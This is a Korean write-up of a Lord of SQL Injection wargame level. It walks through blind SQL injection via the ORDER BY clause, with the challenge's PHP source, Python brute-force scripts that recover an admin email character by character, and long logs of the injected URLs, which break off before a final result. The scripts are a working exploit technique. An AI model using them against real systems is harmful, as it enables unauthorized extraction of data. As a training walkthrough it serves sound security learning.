[Lord Of SQL Injection] 23번(order by 활용★★★★★)

 

---

query : select id,email,score from prob_hell_fire where 1 order by

---

<?php
  include "./config.php";
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\.|proc|union/i', $_GET[order])) exit("No Hack ~_~");
  $query = "select id,email,score from prob_hell_fire where 1 order by {$_GET[order]}";
  echo "<table border=1><tr><th>id</th><th>email</th><th>score</th>";
  $rows = mysqli_query($db,$query);
  while(($result = mysqli_fetch_array($rows))){
    if($result['id'] == "admin") $result['email'] = "**************";
    echo "<tr><td>{$result[id]}</td><td>{$result[email]}</td><td>{$result[score]}</td></tr>";
  }
  echo "</table><hr>query : <strong>{$query}</strong><hr>";

  $_GET[email] = addslashes($_GET[email]);
  $query = "select email from prob_hell_fire where id='admin' and email='{$_GET[email]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['email']) && ($result['email'] === $_GET['email'])) solve("hell_fire");
  highlight_file(__FILE__);
?>

 

KEY Point

id가 "admin" 일 경우 email를 "**************"로 보여준다.

order by를 활용해야 한다. 

 

---

order by는 테이블의 순서를 정렬할 때 사용하는 쿼리이다.(ASC, DESC...)

임의로 https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=id id를 정렬의 기준으로 설정해주면 아래와 같이 테이블이 출력된다.

id	email	score
admin	**************	200
rubiya	rubiya805@gmail.cm	100

id를 정렬기준으로 설정을 해주면 'admin'이 'rubiya' 보다 문자가 앞서기 때문에 'admin'이 테이블의 첫번째 row에 있는걸 확인할 수 있다.

 

정렬 기준 방식을 활용해서 blind sql injection을 해볼 수 있다.

간단한 예로 admin과 rubiya의  email를 첫번째 문자부터 비교를 해볼것이다. 

 

select id,email,score from prob_hell_fire where 1 order by right(left(email, 1), 1)='0',id

right(left(email, 1), 1)='0'와 id를 정렬 기준으로 설정했다.

id를 기준으로 삼으면 

id	email	score
admin	**************	200
rubiya	rubiya805@gmail.cm	100

알파벳 순서에 따라서 'admin'이 row의 첫번째로 온다.

여기에 right(left(email, 1), 1)='0' email의 첫번째 문자가 '0'으로 설정을 하면 어떻게 될까?

id	email	score
admin	**************	200
rubiya	rubiya805@gmail.cm	100

변화가 없다. 여기서 우리가 알아야 할게 있는데 right(left(email, 1), 1)='0'이 참이면 1이 되고 거짓이면 0을 가지게 된다.

그러면 정렬 기준으로 보면 0이 나오고 1이 나와야 한다. 즉 아래와 같이 되야한다.

id	email	score
rubiya	rubiya805@gmail.cm	100
admin	**************(1)	200

---

여기까지 정리를 해보면

email의 문자를 하나씩 비교를 해볼건데

 

참이면

id	email	score
rubiya	rubiya805@gmail.cm	100
admin	**************(1)	200

 

거짓이면

id	email	score
admin	**************(0)	200
rubiya	rubiya805@gmail.cm	100

---

이제 문제를 풀어볼건데 그전에 풀던 방법과 같이 email의 길이를 알아야한다.

select id,email,score from prob_hell_fire where 1 order by length(email)=?,id

email의 길이가 일치하지 않으면

id	email	score
admin	**************(0)	200
rubiya	rubiya805@gmail.cm	100

 

email의 길이가 일치하면

id	email	score
rubiya	rubiya805@gmail.cm	100
admin	**************(1)	200

코딩을 짜보자!!

import requests
import string

url = "https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php"
cookie = dict(PHPSESSID="qh6cd97grivfurvhcaobv2sqjt")

for i in range(1,100):
    param = "?order=length(email)="+str(i)+",id"
    len_result = url+param
    response = requests.get(len_result, cookies=cookie)
    print(len_result)

    #result = response.text.find("admin")
    #print(result)
    if response.text.find("admin") == 130:
        print("password :"+str(i))
        break

 

 

if response.text.find("admin") == 130:

 

"admin"의 위치를 130으로 설정을 해준이유는?

import requests
import string

url = "https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php"
cookie = dict(PHPSESSID="p8prksa84jarcv6dhadt2dbn6s")

for i in range(1,100):
    param = "?order=length(email)="+str(i)+",id"
    #param = "?pw='or id='admin' and if(length(pw)="+str(i)+", 1, (select 1 union select 2))%23"
    len_result = url+param
    response = requests.get(len_result, cookies=cookie)
    print(len_result)

    result = response.text.find("admin")
    print(result)
    #if response.text.find("admin") == 130:
    #    print("password :"+str(i))
    #    break

이렇게 해서 코드 돌려주면 

.
.
.
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=25,id
67
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=26,id
67
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=27,id
67
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=28,id
130
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=29,id
67
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=30,id
67
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=31,id
67
.
.
.

이렇게 일정한 값이 뜨다가 중간에 위치가 바뀌게 되는데 이 부분이 바로  

위에꺼에서 아래껄로 바뀌는 시점이다.

그러니까 admin이 row의 첫번째에 위치할때 admin의 'a'가 67에 위치하다가 row의 두번째에 위치할때 130에 위치하게 된다. 이걸 활용해서 코드를 짜서 위에와 같은 코드가 나온것이다.(물론 admin이 코드에도 써져있는데 find()함수는 가장 가까운 위치의 값을 알려주니까 사용는데 아니면 score에 있는 200을 활용해서 짜도 됨.)

 

그래서 첫번째 코드 결과값을 확인하면

https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=1,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=2,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=3,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=4,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=5,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=6,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=7,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=8,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=9,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=10,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=11,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=12,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=13,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=14,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=15,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=16,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=17,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=18,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=19,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=20,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=21,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=22,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=23,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=24,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=25,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=26,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=27,id
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=length(email)=28,id
password :28

28글자 인걸 확인할 수 있다.

 

이제는 blind sql injection을 활용해서 email을 한 글자씩 확인해보아야 한다. 

여기서 활용해야 할 부분이 있는데

 

rubiya의 email

admin의 email

r

u

b

i

y

a

8

0

5

@

g

m

a

i

l

.

c

m

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

일단 rubiya의 email인 rubiya805@gamil.cm과 admin의 email과 한 문자씩 비교를 해보면

 

r 과 * 비교해서 거짓이면 위에서 계속 설명하던거와 같이

참이면

여기까지 일단 해결 완료!

---

다음으로

rubiya의 email

admin의 email

r

u

b

i

y

a

8

0

5

@

g

m

a

i

l

.

c

m

*

*

*

i

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

만약 rubiya의 email과 admin의 email을 한 글자씩 비교하는데 같은 글자 일수도 있다.

이런 경우는 rubiya의 email의 몇번째 글자인지 파악해서 그 부분을 파싱해야 한다.(뒤에 코드로 같이 설명)

---

 email 구하는 코드

import requests
import string


url = "https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php"
cookie = dict(PHPSESSID="p8prksa84jarcv6dhadt2dbn6s")

asc = string.digits+string.ascii_letters+string.punctuation
print(asc)
result=""
count = 0
email = "rubiya805@gmail.cm"


for i in range(1,29):
    for j in asc:
        param = "?order=ord(right(left(email,"+str(i)+"),1))="+str(ord(j))+",id"
        res_url = url+param
        print(res_url)
        response = requests.get(res_url, cookies=cookie)

        if response.text.find("admin")==130:
            print(str(i)+"번째 패스워드 :"+j)
            result+=j
            count=0
            break

        count+=1
        print(count)

        try:
            if count == len(asc):
                result+=email[i-1]
                print(str(i)+"번째 패스워드 :"+email[i-1])
                count=0
        except IndexError:  
            result+=email[len(email)-1]    
            print(str(i)+"번째 패스워드 :"+email[len(email)-1]) 
            count=0
            
print("pw :"+result)

기존 코드에 뼈대를 붙인건데 

먼저 asc = string.digits+string.ascii_letters+string.punctuation 특수문자도 비교를 해야되서 비교군에 puctuation도 추가해주었다.

 

count 변수를 추가해주었는데 위에서 문자가 서로 같을 때 rubiya의 email의 순서를 파싱해서 코드짠다고 한 부분에서 필요한 변수다. 문자가 서로 같으면 asc을 다 비교해도 테이블의 admin과 rubiya의 순서가 바뀌지 않는다. 그러면 ...==130에서 걸러지지 않는다. 그래서 asc 하나씩 비교할때 마다 count에 1씩 더해서 asc의 길이인 94가 되면 130에서 걸리지지 않았다는거고, email[i-1]에서 i는 admin의 email의 문자의 일부고 email은 rubiya의 email이다.  그래서 admin의 email과 rubiya의 email과 비교해서 같은 자리에 같은 문자가 있으면 테이블에서 row의 위치가 변경되지 않으니까 rubiya의 email의 비교한 문자를 파싱해서 result에 삽입한다.

 

여기서 변수가 있는데 rubiya의 email은 18자고 admin의 email은 28자니까 둘이 한글자씩 비교하면 IndexError가 발생한다. 

rubiya의 email

admin의 email

r

u

b

i

y

a

8

0

5

@

g

m

a

i

l

.

c

m

*

*

*

i

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

*

그래서18자리를 초과하면 초과한 자리의 문자들은 rubiya의 email의 끝자리 m과 계속 비교를 하게된다.

결국 email[len(email)-1](이거 m을 나타냄) 예외가 뜨면 m을 추가해준다.

 

.
.
.
24번째 패스워드 :1
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=48,id
1
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=49,id
2
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=50,id
3
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=51,id
4
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=52,id
5
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=53,id
6
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=54,id
7
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=55,id
8
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=56,id
9
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=57,id
10
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=97,id
11
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=98,id
12
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=99,id
13
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=100,id
14
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=101,id
15
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=102,id
16
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=103,id
17
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=104,id
18
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=105,id
19
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=106,id
20
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=107,id
21
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=108,id
22
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=109,id
23
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=110,id
24
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=111,id
25
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=112,id
26
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=113,id
27
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=114,id
28
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=115,id
29
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=116,id
30
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=117,id
31
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=118,id
32
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=119,id
33
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=120,id
34
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=121,id
35
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=122,id
36
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=65,id
37
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=66,id
38
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=67,id
39
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=68,id
40
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=69,id
41
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=70,id
42
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=71,id
43
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=72,id
44
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=73,id
45
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=74,id
46
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=75,id
47
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=76,id
48
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=77,id
49
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=78,id
50
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=79,id
51
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=80,id
52
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=81,id
53
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=82,id
54
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=83,id
55
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=84,id
56
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=85,id
57
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=86,id
58
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=87,id
59
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=88,id
60
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=89,id
61
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=90,id
62
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=33,id
63
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=34,id
64
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=35,id
65
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=36,id
66
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=37,id
67
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=38,id
68
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=39,id
69
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=40,id
70
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=41,id
71
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=42,id
72
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=43,id
73
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=44,id
74
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=45,id
75
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,25),1))=46,id
25번째 패스워드 :.
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,26),1))=48,id
1
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,26),1))=49,id
2
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,26),1))=50,id
3
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,26),1))=51,id
4
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,26),1))=52,id
5
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,26),1))=53,id
6
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,26),1))=54,id
7
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,26),1))=55,id
8
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,26),1))=56,id
9
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,26),1))=57,id
10
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,26),1))=97,id
11
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,26),1))=98,id
12
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,26),1))=99,id
26번째 패스워드 :c
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,27),1))=48,id
1
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,27),1))=49,id
2
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,27),1))=50,id
3
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,27),1))=51,id
4
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,27),1))=52,id
5
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,27),1))=53,id
6
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,27),1))=54,id
7
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,27),1))=55,id
8
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,27),1))=56,id
9
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,27),1))=57,id
10
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,27),1))=97,id
11
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,27),1))=98,id
12
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,27),1))=99,id
13
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,27),1))=100,id
14
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,27),1))=101,id
15
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,27),1))=102,id
16
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,27),1))=103,id
17
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,27),1))=104,id
18
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,27),1))=105,id
19
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,27),1))=106,id
20
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,27),1))=107,id
21
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,27),1))=108,id
22
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,27),1))=109,id
23
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,27),1))=110,id
24
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,27),1))=111,id
27번째 패스워드 :o
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=48,id
1
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=49,id
2
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=50,id
3
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=51,id
4
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=52,id
5
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=53,id
6
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=54,id
7
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=55,id
8
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=56,id
9
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=57,id
10
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=97,id
11
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=98,id
12
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=99,id
13
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=100,id
14
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=101,id
15
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=102,id
16
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=103,id
17
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=104,id
18
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=105,id
19
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=106,id
20
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=107,id
21
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=108,id
22
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=109,id
23
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=110,id
24
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=111,id
25
https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=ord(right(left(email,28),1))=112,id
26
